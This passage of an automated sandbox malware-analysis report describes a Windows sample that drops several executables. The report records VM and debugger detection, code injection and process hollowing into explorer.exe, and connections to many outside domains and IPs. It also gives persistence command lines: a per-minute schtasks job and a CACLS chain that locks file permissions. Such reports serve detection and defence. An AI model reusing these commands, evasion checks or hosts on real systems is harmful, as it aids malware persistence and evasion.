Source: C:\Users\user\AppData\Local\Temp\FE5F.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\FE5F.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\oldplayer.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\207aa4515d\oneetx.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Source: file.exe, 00000000.00000002.572135281.00000000024B8000.00000004.00000020.00020000.00000000.sdmp, rfuiwjh, 00000004.00000002.636725286.000000000260B000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: ASWHOOK

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Source: C:\Users\user\AppData\Local\Temp\325D.exe

WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController

Checks if the current machine is a virtual machine (disk enumeration)

Source: C:\Users\user\Desktop\file.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Roaming\rfuiwjh	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Roaming\rfuiwjh	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Roaming\rfuiwjh	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Roaming\rfuiwjh	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Roaming\rfuiwjh	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Roaming\rfuiwjh	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\96DF.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
Source: C:\Users\user\AppData\Local\Temp\96DF.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
Source: C:\Users\user\AppData\Local\Temp\96DF.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
Source: C:\Users\user\AppData\Local\Temp\96DF.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
Source: C:\Users\user\AppData\Local\Temp\96DF.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
Source: C:\Users\user\AppData\Local\Temp\96DF.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI

Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)

Source: C:\Users\user\AppData\Local\Temp\325D.exe

WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive

Source: C:\Windows\explorer.exe TID: 3740	Thread sleep time: -510000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\325D.exe TID: 7096	Thread sleep time: -11068046444225724s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\325D.exe TID: 6360	Thread sleep count: 9678 > 30
Source: C:\Users\user\AppData\Local\Temp\FE5F.exe TID: 6856	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\aafg31.exe TID: 6988	Thread sleep time: -1800000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\207aa4515d\oneetx.exe TID: 5360	Thread sleep count: 37 > 30
Source: C:\Users\user\AppData\Local\Temp\207aa4515d\oneetx.exe TID: 5360	Thread sleep time: -1110000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\207aa4515d\oneetx.exe TID: 5432	Thread sleep time: -3060000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\207aa4515d\oneetx.exe TID: 5360	Thread sleep time: -30000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\207aa4515d\oneetx.exe TID: 5432	Thread sleep time: -180000s >= -30000s

Source: C:\Windows\explorer.exe	Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\aafg31.exe	Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\207aa4515d\oneetx.exe	Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\207aa4515d\oneetx.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Users\user\AppData\Local\Temp\E640.exe

Evasive API call chain: GetModuleFileName,DecisionNodes,ExitProcess

graph_6-33851

Source: C:\Users\user\AppData\Local\Temp\325D.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\FE5F.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\aafg31.exe	Thread delayed: delay time: 300000
Source: C:\Users\user\AppData\Local\Temp\207aa4515d\oneetx.exe	Thread delayed: delay time: 180000
Source: C:\Users\user\AppData\Local\Temp\207aa4515d\oneetx.exe	Thread delayed: delay time: 180000

Source: C:\Windows\explorer.exe	Window / User API: threadDelayed 414	Jump to behavior
Source: C:\Windows\explorer.exe	Window / User API: threadDelayed 404	Jump to behavior
Source: C:\Windows\explorer.exe	Window / User API: foregroundWindowGot 820	Jump to behavior
Source: C:\Windows\explorer.exe	Window / User API: foregroundWindowGot 803	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\325D.exe	Window / User API: threadDelayed 9678

Source: C:\Users\user\AppData\Local\Temp\E640.exe

API coverage: 6.5 %

Source: C:\Windows\explorer.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\B225.exe	Jump to dropped file
Source: C:\Windows\explorer.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\A41A.dll	Jump to dropped file
Source: C:\Windows\explorer.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\48EA.exe	Jump to dropped file
Source: C:\Windows\explorer.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\2A49.dll	Jump to dropped file
Source: C:\Windows\explorer.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\C523.exe	Jump to dropped file
Source: C:\Windows\explorer.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\4F92.exe	Jump to dropped file

Source: C:\Users\user\AppData\Local\Temp\E640.exe

Code function: 5_2_03FEA71C rdtsc

5_2_03FEA71C

Source: C:\Users\user\AppData\Local\Temp\325D.exe

Registry key enumerated: More than 150 enums for key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall

Source: C:\Users\user\AppData\Local\Temp\E640.exe

Evaded block: after key decision

graph_6-33824

Source: C:\Users\user\AppData\Local\Temp\325D.exe

WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor

Source: C:\Users\user\AppData\Local\Temp\E640.exe

Code function: _malloc,_malloc,_wprintf,_free,GetAdaptersInfo,_free,_malloc,GetAdaptersInfo,_sprintf,_wprintf,_wprintf,_free,

6_2_0040E670

Source: C:\Users\user\AppData\Local\Temp\325D.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\FE5F.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\aafg31.exe	Thread delayed: delay time: 300000
Source: C:\Users\user\AppData\Local\Temp\207aa4515d\oneetx.exe	Thread delayed: delay time: 30000
Source: C:\Users\user\AppData\Local\Temp\207aa4515d\oneetx.exe	Thread delayed: delay time: 180000
Source: C:\Users\user\AppData\Local\Temp\207aa4515d\oneetx.exe	Thread delayed: delay time: 30000
Source: C:\Users\user\AppData\Local\Temp\207aa4515d\oneetx.exe	Thread delayed: delay time: 180000

Source: C:\Users\user\AppData\Local\Temp\E640.exe

API call chain: ExitProcess graph end node

graph_6-33853

Source: explorer.exe, 00000003.00000000.558335978.000000000834F000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&0000006
Source: explorer.exe, 00000003.00000000.558335978.000000000830B000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
Source: 325D.exe, 00000011.00000002.802882315.0000000002637000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMware
Source: explorer.exe, 00000003.00000000.551231764.00000000059F0000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}b
Source: explorer.exe, 00000003.00000000.558335978.0000000008394000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: aafg31.exe, 0000001A.00000003.719273423.00000000032AB000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: H80ehgFST82YbagYP/3soq5XCV103AABO8GWOM9jzUG9pqQ65IP5GPRDu23FkMjK3Gf1kr3Gpm7V9YaGVWMT3DkRpma9uAKjugadVJIYOFY1y+6YRFe2KQ0yHIM1qIYj7zj0oSZW5Slt2VgQs8hx01yo6lDVFhiRuON0sQwcb2qNRei3qWLNNFuLdVjjUrzAJ0FHvbwSyBCVdgqWL7Ek2ZfQH2majYYubCIrUCQ2I0bzay8s4kA+AcPNbK6MV3HX0LSc5ymtbjTawsGRGFd2ulQpExVMmjfsHcEAnyDE6s9/TukwBiopsUBAA6V4PZM0sHF4NzVg/RhrGAPuvFXQq9gEMA1ZA8Toc7o7D6Bnz5z8s4kBsCyk2dh+/YI5Ql1g2oRl70R45AWYOpCIrHyOmTExLB+MVDS93CSkucWzaXeY0DP5Al7hNGcCPm7WdU6YLZycMqwaZj1RF/HiYKopVo1ap/KmxOZyAA10YTTzVoON55LbNU9qKzCF@
Source: aafg31.exe, 0000001A.00000003.717250406.000000000329B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: H80ehgFST82YbagYP/3soq5XCV103AABO8GWOM9jzUG9pqQ65IP5GPRDu23FkMjK3Gf1kr3Gpm7V9YaGVWMT3DkRpma9uAKjugadVJIYOFY1y+6YRFe2KQ0yHIM1qIYj7zj0oSZW5Slt2VgQs8hx01yo6lDVFhiRuON0sQwcb2qNRei3qWLNNFuLdVjjUrzAJ0FHvbwSyBCVdgqWL7Ek2ZfQH2majYYubCIrUCQ2I0bzay8s4kA+AcPNbK6MV3HX0LSc5ymtbjTawsGRGFd2ulQpExVMmjfsHcEAnyDE6s9/TukwBiopsUBAA6V4PZM0sHF4NzVg/RhrGAPuvFXQq9gEMA1ZA8Toc7o7D6Bnz5z8s4kBsCyk2dh+/YI5Ql1g2oRl70R45AWYOpCIrHyOmTExLB+MVDS93CSkucWzaXeY0DP5Al7hNGcCPm7WdU6YLZycMqwaZj1RF/HiYKopVo1ap/KmxOZyAA10YTTzVoON55LbNU9qKzCF
Source: E640.exe, 00000006.00000002.634735548.00000000007D7000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWP
Source: explorer.exe, 00000003.00000000.560109132.000000000CDC8000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: _VMware_SATA_CD00#5&
Source: E640.exe, 00000006.00000003.633659025.000000000082D000.00000004.00000020.00020000.00000000.sdmp, E640.exe, 00000006.00000002.634735548.000000000082D000.00000004.00000020.00020000.00000000.sdmp, 617B.exe, 00000008.00000002.639090518.0000000000888000.00000004.00000020.00020000.00000000.sdmp, 617B.exe, 00000008.00000002.639090518.0000000000912000.00000004.00000020.00020000.00000000.sdmp, 5274.exe, 0000000A.00000003.641630319.0000000000725000.00000004.00000020.00020000.00000000.sdmp, 5274.exe, 0000000A.00000002.664219760.0000000000725000.00000004.00000020.00020000.00000000.sdmp, C474.exe, 00000012.00000002.668749722.0000000000627000.00000004.00000020.00020000.00000000.sdmp, C474.exe, 00000012.00000003.666539561.0000000000627000.00000004.00000020.00020000.00000000.sdmp, 5274.exe, 00000018.00000003.670975307.0000000000775000.00000004.00000020.00020000.00000000.sdmp, 5274.exe, 00000018.00000003.670975307.0000000000731000.00000004.00000020.00020000.00000000.sdmp, 5274.exe, 00000018.00000002.674374983.0000000000733000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: oneetx.exe, 0000001D.00000002.802176864.0000000001567000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWF
Source: 5274.exe, 0000000A.00000002.664219760.0000000000698000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW(
Source: explorer.exe, 00000003.00000000.558335978.000000000830B000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&0000000
Source: aafg31.exe, 0000001A.00000003.685109296.0000000000E7C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: 23TTPL8ycERvYa+v2DGlUmLdRcUa8JvlNv5MnW63qrAoY3MIz4XFdquCuB2O8Saf5uD5XB2XhlSnr7sk3grNdoMQC7oFCiSCM8L5RJ4SH80ehgFST82YbagY
Source: 5274.exe, 00000019.00000002.675421792.00000000008EB000.00000004.00000020.00020000.00000000.sdmp, 5274.exe, 00000019.00000003.672470751.00000000008EB000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWen-USn
Source: 5274.exe, 0000000A.00000003.641630319.0000000000725000.00000004.00000020.00020000.00000000.sdmp, 5274.exe, 0000000A.00000002.664219760.0000000000725000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWen-USnVW
Source: 325D.exe, 00000011.00000002.802882315.0000000002637000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Win32_VideoController(Standard display types)VMwareDBPF1C3EWin32_VideoController7V_6VC8FVideoController120060621000000.000000-0008341123.display.infMSBDASHKGRNPFPCI\VEN_15AD&DEV_0405&SUBSYS_040515AD&REV_00\3&61AAA01&0&78OKWin32_ComputerSystemcomputer1280 x 1024 x 4294967296 colorsP8XNPW9_
Source: FE5F.exe, 00000017.00000002.685332403.000000000147E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
Source: aafg31.exe, 0000001A.00000002.801135732.0000000000DD9000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW@
Source: 5274.exe, 0000000A.00000002.664219760.0000000000698000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\z
Source: C474.exe, 00000012.00000002.668749722.00000000005C2000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW8_c%SystemRoot%\system32\mswsock.dllQ

Source: C:\Users\user\Desktop\file.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\E640.exe	Code function: 6_2_00410160 PathFindFileNameW,PathFindFileNameW,_memmove,PathFindFileNameW,_memmove,PathAppendW,_memmove,PathFileExistsW,_malloc,lstrcpyW,lstrcatW,_free,FindFirstFileW,PathFindExtensionW,_wcsstr,_wcsstr,FindNextFileW,FindClose,		6_2_00410160
Source: C:\Users\user\AppData\Local\Temp\E640.exe	Code function: 6_2_0040F730 PathFindFileNameW,PathFindFileNameW,_memmove,PathFindFileNameW,_memmove,PathAppendW,_memmove,PathFileExistsW,_malloc,lstrcpyW,lstrcatW,_free,FindFirstFileW,PathFindExtensionW,_wcsstr,_wcsstr,_wcsstr,_wcsstr,FindNextFileW,FindClose,		6_2_0040F730

Source: C:\Users\user\Desktop\file.exe

System information queried: ModuleInformation

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\oldplayer.exe

File Volume queried: C:\ FullSizeInformation

Anti Debugging

Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))

Source: C:\Users\user\Desktop\file.exe	System information queried: CodeIntegrityInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\rfuiwjh	System information queried: CodeIntegrityInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\96DF.exe	System information queried: CodeIntegrityInformation

Source: C:\Users\user\AppData\Local\Temp\E640.exe

6_2_00412220

Source: C:\Users\user\AppData\Roaming\rfuiwjh	Code function: 4_2_0246092B mov eax, dword ptr fs:[00000030h]	4_2_0246092B
Source: C:\Users\user\AppData\Roaming\rfuiwjh	Code function: 4_2_02460D90 mov eax, dword ptr fs:[00000030h]	4_2_02460D90
Source: C:\Users\user\AppData\Local\Temp\E640.exe	Code function: 5_2_03FE90A3 push dword ptr fs:[00000030h]	5_2_03FE90A3
Source: C:\Users\user\AppData\Local\Temp\E640.exe	Code function: 5_2_04100042 push dword ptr fs:[00000030h]	5_2_04100042

Source: C:\Users\user\Desktop\file.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Roaming\rfuiwjh	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\96DF.exe	Process queried: DebugPort

Source: C:\Users\user\AppData\Local\Temp\E640.exe

Code function: 6_2_00424168 _memset,IsDebuggerPresent,

6_2_00424168

Source: C:\Users\user\AppData\Local\Temp\E640.exe

Code function: 6_2_0042A57A EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,

6_2_0042A57A

Source: C:\Users\user\AppData\Local\Temp\E640.exe

Code function: 6_2_00447CAC __lseeki64_nolock,__lseeki64_nolock,GetProcessHeap,HeapAlloc,__setmode_nolock,__write_nolock,__setmode_nolock,GetProcessHeap,HeapFree,__lseeki64_nolock,SetEndOfFile,GetLastError,__lseeki64_nolock,

6_2_00447CAC

Source: C:\Users\user\AppData\Local\Temp\E640.exe

Code function: 5_2_03FEA71C rdtsc

5_2_03FEA71C

Source: C:\Users\user\AppData\Local\Temp\325D.exe

Memory allocated: page read and write | page guard

Source: C:\Users\user\AppData\Local\Temp\E640.exe	Code function: 6_2_004329EC SetUnhandledExceptionFilter,UnhandledExceptionFilter,		6_2_004329EC
Source: C:\Users\user\AppData\Local\Temp\E640.exe	Code function: 6_2_004329BB SetUnhandledExceptionFilter,		6_2_004329BB

HIPS / PFW / Operating System Protection Evasion

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\explorer.exe	Domain query: colisumy.com
Source: C:\Windows\explorer.exe	Domain query: potunulit.org
Source: C:\Windows\explorer.exe	Network Connect: 193.106.174.125 80	Jump to behavior
Source: C:\Windows\explorer.exe	Domain query: h170013.srv22.test-hf.su
Source: C:\Windows\explorer.exe	Network Connect: 175.119.10.231 80	Jump to behavior
Source: C:\Windows\explorer.exe	Domain query: shsplatform.co.uk
Source: C:\Windows\explorer.exe	Network Connect: 196.188.169.138 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 95.86.21.52 80	Jump to behavior
Source: C:\Windows\explorer.exe	Domain query: nordskills.eu
Source: C:\Windows\explorer.exe	Network Connect: 89.208.104.62 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 80.66.203.53 443	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 213.6.54.58 443	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 115.88.24.200 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 45.9.74.80 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 151.251.31.98 80	Jump to behavior
Source: C:\Windows\explorer.exe	Domain query: greenbi.net
Source: C:\Windows\explorer.exe	Network Connect: 188.114.97.7 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 200.114.247.163 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 95.214.25.207 3003	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 188.114.96.7 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 183.100.39.157 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 190.224.203.37 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 185.12.79.25 80	Jump to behavior
Source: C:\Windows\explorer.exe	Domain query: reinroot.top
Source: C:\Windows\explorer.exe	Network Connect: 91.227.16.22 80	Jump to behavior

Benign windows process drops PE files

Source: C:\Windows\explorer.exe

File created: 2A49.dll.3.dr

Jump to dropped file

Maps a DLL or memory area into another process

Source: C:\Users\user\Desktop\file.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: read write	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read	Jump to behavior
Source: C:\Users\user\AppData\Roaming\rfuiwjh	Section loaded: unknown target: C:\Windows\explorer.exe protection: read write	Jump to behavior
Source: C:\Users\user\AppData\Roaming\rfuiwjh	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\96DF.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: read write
Source: C:\Users\user\AppData\Local\Temp\96DF.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read

Injects a PE file into a foreign processes

Source: C:\Users\user\AppData\Local\Temp\E640.exe	Memory written: C:\Users\user\AppData\Local\Temp\E640.exe base: 400000 value starts with: 4D5A	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\617B.exe	Memory written: C:\Users\user\AppData\Local\Temp\617B.exe base: 400000 value starts with: 4D5A	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5274.exe	Memory written: C:\Users\user\AppData\Local\Temp\5274.exe base: 400000 value starts with: 4D5A	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\C474.exe	Memory written: C:\Users\user\AppData\Local\Temp\C474.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\AppData\Local\c2de098c-0a25-4298-a1ee-c3ab6cc684bc\5274.exe	Memory written: C:\Users\user\AppData\Local\c2de098c-0a25-4298-a1ee-c3ab6cc684bc\5274.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\AppData\Local\Temp\5274.exe	Memory written: C:\Users\user\AppData\Local\Temp\5274.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\AppData\Local\c2de098c-0a25-4298-a1ee-c3ab6cc684bc\5274.exe	Memory written: C:\Users\user\AppData\Local\c2de098c-0a25-4298-a1ee-c3ab6cc684bc\5274.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\AppData\Local\c2de098c-0a25-4298-a1ee-c3ab6cc684bc\5274.exe	Memory written: C:\Users\user\AppData\Local\c2de098c-0a25-4298-a1ee-c3ab6cc684bc\5274.exe base: 400000 value starts with: 4D5A

Contains functionality to inject code into remote processes

Source: C:\Users\user\AppData\Local\Temp\E640.exe

Code function: 5_2_04100110 VirtualAlloc,GetModuleFileNameA,CreateProcessA,VirtualFree,VirtualAlloc,GetThreadContext,ReadProcessMemory,NtUnmapViewOfSection,VirtualAllocEx,NtWriteVirtualMemory,NtWriteVirtualMemory,WriteProcessMemory,SetThreadContext,ResumeThread,ExitProcess,

5_2_04100110

Creates a thread in another existing process (thread injection)

Source: C:\Users\user\Desktop\file.exe	Thread created: C:\Windows\explorer.exe EIP: 2B11B14	Jump to behavior
Source: C:\Users\user\AppData\Roaming\rfuiwjh	Thread created: unknown EIP: 47C1B14	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\96DF.exe	Thread created: unknown EIP: 2B31978

Sample uses process hollowing technique

Source: C:\Users\user\AppData\Local\c2de098c-0a25-4298-a1ee-c3ab6cc684bc\5274.exe

Section unmapped: unknown base address: 400000

Source: C:\Users\user\AppData\Local\Temp\E640.exe	Process created: C:\Users\user\AppData\Local\Temp\E640.exe C:\Users\user\AppData\Local\Temp\E640.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\617B.exe	Process created: C:\Users\user\AppData\Local\Temp\617B.exe C:\Users\user\AppData\Local\Temp\617B.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5274.exe	Process created: C:\Users\user\AppData\Local\Temp\5274.exe C:\Users\user\AppData\Local\Temp\5274.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\C474.exe	Process created: C:\Users\user\AppData\Local\Temp\C474.exe C:\Users\user\AppData\Local\Temp\C474.exe
Source: C:\Users\user\AppData\Local\c2de098c-0a25-4298-a1ee-c3ab6cc684bc\5274.exe	Process created: C:\Users\user\AppData\Local\c2de098c-0a25-4298-a1ee-c3ab6cc684bc\5274.exe C:\Users\user\AppData\Local\c2de098c-0a25-4298-a1ee-c3ab6cc684bc\5274.exe --Task
Source: C:\Users\user\AppData\Local\Temp\5274.exe	Process created: C:\Users\user\AppData\Local\Temp\5274.exe "C:\Users\user\AppData\Local\Temp\5274.exe" --Admin IsNotAutoStart IsNotTask
Source: C:\Users\user\AppData\Local\c2de098c-0a25-4298-a1ee-c3ab6cc684bc\5274.exe	Process created: C:\Users\user\AppData\Local\c2de098c-0a25-4298-a1ee-c3ab6cc684bc\5274.exe "C:\Users\user\AppData\Local\c2de098c-0a25-4298-a1ee-c3ab6cc684bc\5274.exe" --AutoStart
Source: C:\Users\user\AppData\Local\Temp\FE5F.exe	Process created: C:\Users\user\AppData\Local\Temp\aafg31.exe "C:\Users\user\AppData\Local\Temp\aafg31.exe"
Source: C:\Users\user\AppData\Local\Temp\FE5F.exe	Process created: C:\Users\user\AppData\Local\Temp\oldplayer.exe "C:\Users\user\AppData\Local\Temp\oldplayer.exe"
Source: C:\Users\user\AppData\Local\Temp\FE5F.exe	Process created: C:\Users\user\AppData\Local\Temp\XandETC.exe "C:\Users\user\AppData\Local\Temp\XandETC.exe"
Source: C:\Users\user\AppData\Local\Temp\oldplayer.exe	Process created: C:\Users\user\AppData\Local\Temp\207aa4515d\oneetx.exe "C:\Users\user\AppData\Local\Temp\207aa4515d\oneetx.exe"
Source: C:\Users\user\AppData\Local\Temp\207aa4515d\oneetx.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN oneetx.exe /TR "C:\Users\user\AppData\Local\Temp\207aa4515d\oneetx.exe" /F
Source: C:\Users\user\AppData\Local\Temp\207aa4515d\oneetx.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k echo Y\|CACLS "oneetx.exe" /P "user:N"&&CACLS "oneetx.exe" /P "user:R" /E&&echo Y\|CACLS "..\207aa4515d" /P "user:N"&&CACLS "..\207aa4515d" /P "user:R" /E&&Exit
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo Y"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cacls.exe CACLS "oneetx.exe" /P "user:N"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cacls.exe CACLS "oneetx.exe" /P "user:R" /E
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo Y"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cacls.exe CACLS "..\207aa4515d" /P "user:N"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cacls.exe CACLS "..\207aa4515d" /P "user:R" /E
Source: C:\Users\user\AppData\Local\c2de098c-0a25-4298-a1ee-c3ab6cc684bc\5274.exe	Process created: unknown unknown

Source: C:\Users\user\AppData\Local\Temp\E640.exe

